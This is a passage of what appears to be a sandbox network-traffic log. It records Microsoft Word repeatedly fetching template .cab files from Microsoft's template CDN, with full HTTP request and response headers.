      Content-MD5: xH40MK+BPfiwLhy0gp3ZSw==
      Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
      ETag: 0x8D36AC8875AEF5A
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 77d2d97b-f01e-00d8-5fc1-a3ad73000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328935.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 23597
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: fGRexQWYL+Up0OUDWzeP/A==
      Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
      ETag: 0x8D36AC887EFBA2F
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 56e459b1-f01e-010c-2097-a0e32f000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03998158.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 42788
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: IaS3txYxwszaX7umN1Hw0g==
      Last-Modified: Fri, 22 Apr 2016 16:11:18 GMT
      ETag: 0x8D36AC8BD065412
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 620287b7-401e-00f2-3213-ba7263000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328940.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 21791
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: e/iLPKIOtx7UU6M2GQjgEA==
      Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
      ETag: 0x8D36AC8883A8134
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: bab20722-a01e-0046-4c1d-22b4c2000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328951.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 19893
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 75y4vfvAjwO+9RmtZrpkLw==
      Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
      ETag: 0x8D36AC8888436CF
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: f60ed86d-c01e-00fc-3b97-a05bd3000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328972.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 21111
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 0wrSbbtt7KT90pT0jtrVXQ==
      Last-Modified: Fri, 22 Apr 2016 16:09:51 GMT
      ETag: 0x8D36AC888CEAFBE
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 477f7fba-801e-00a0-169e-b90e8b000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328975.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 22594
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 7gEpx8waySu8PWyw9lP8rg==
      Last-Modified: Fri, 22 Apr 2016 16:09:51 GMT
      ETag: 0x8D36AC889183E51
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: a209c062-f01e-003c-4097-a0a3ed000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328986.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 22340
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: iyn6tQb9ZcIcnNb+a7vBRg==
      Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
      ETag: 0x8D36AC889AD573C
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: f2e243ab-801e-015b-4097-a04d1c000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:44 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328983.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 21875
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 5TIDh2JQP/oTcd8D+i4iLQ==
      Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
      ETag: 0x8D36AC88963C8B3
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: b450fbbe-c01e-00c3-7c97-a09370000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp03328990.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 19288
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: uab/cVcZ7p3hZCGrmDynRQ==
      Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
      ETag: 0x8D36AC88A1DF716
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 6d182899-901e-0083-4897-a09448000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0345747501.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 271273
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: IUN4l8m4isLLK7L++SLRkQ==
      Last-Modified: Wed, 29 Aug 2018 18:16:49 GMT
      ETag: 0x8D60DDB967B9FA5
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: dacba5b7-401e-0105-2397-a08a43000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0345749101.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 261258
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: ZYKNx76Loc5hrXFCJSrMVA==
      Last-Modified: Wed, 29 Aug 2018 18:23:58 GMT
      ETag: 0x8D60DDC968C4F0E
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 02d4ae31-901e-0135-6fd0-ae1833000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:44 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0345750301.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 640684
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: +TNk7sbE/6V2jeVFosNPBw==
      Last-Modified: Wed, 29 Aug 2018 18:15:13 GMT
      ETag: 0x8D60DDB5D624CF0
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7adc3bba-701e-004d-4a96-8afe8b000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0345751001.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 1065873
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 4RAcym4/7bKLV69MQbUNNw==
      Last-Modified: Wed, 29 Aug 2018 18:15:37 GMT
      ETag: 0x8D60DDB6BA6E455
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 9ae00d4d-001e-0028-7797-a0eb82000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:44 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0345749601.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 550906
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: HBIxXIYqdFpkfa1UbrQmfg==
      Last-Modified: Wed, 29 Aug 2018 18:21:00 GMT
      ETag: 0x8D60DDC2BE7DF3C
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 0414ccae-601e-0011-165a-b9109e000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0345751501.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 222992
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: Jr6rnM6v5Pvwt8A2JoGp0g==
      Last-Modified: Wed, 29 Aug 2018 18:20:50 GMT
      ETag: 0x8D60DDC26100537
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 6efd7f9e-101e-00b2-2f97-a0755b000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0403391701.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 698244
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 4pziZjpWoUROqjcy/7gpQA==
      Last-Modified: Wed, 29 Aug 2018 18:15:39 GMT
      ETag: 0x8D60DDB6CAEA91D
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: d7c59a99-101e-0021-318b-c7a43e000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:44 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0403391901.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 1097591
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: v5XpZ+fRzsjv5Ca8ASfT3g==
      Last-Modified: Wed, 29 Aug 2018 18:16:09 GMT
      ETag: 0x8D60DDB7EAA50F0
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 4b5a1384-701e-0032-6dfb-b98a5d000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:44 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0403392101.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 1881952
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: U8X0WyLhM7KNS9O1o1D9vQ==
      Last-Modified: Wed, 29 Aug 2018 18:19:46 GMT
      ETag: 0x8D60DDC0007D57D
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: c3e299e4-301e-0068-0e2c-b46638000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp0403392501.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 1310275
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: nJ9JpHIiwYAlzCVXUzepZQ==
      Last-Modified: Wed, 29 Aug 2018 18:17:15 GMT
      ETag: 0x8D60DDBA5EDDA1A
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: ef258b2c-c01e-001b-4d97-a016fb000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:43 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp1000111403.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 953453
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 1OrACenntkuLABroK4EC+g==
      Last-Modified: Thu, 12 Jul 2018 00:20:10 GMT
      ETag: 0x8D5E78D3A9D8C97
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 6910c7b5-e01e-00d4-5297-a03a7b000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 11 Dec 2024 09:46:44 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab
      WINWORD.EXE
      Remote address:
      2.19.252.161:443
      Request
      GET /support/templates/en-us/tp1000111502.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 230916
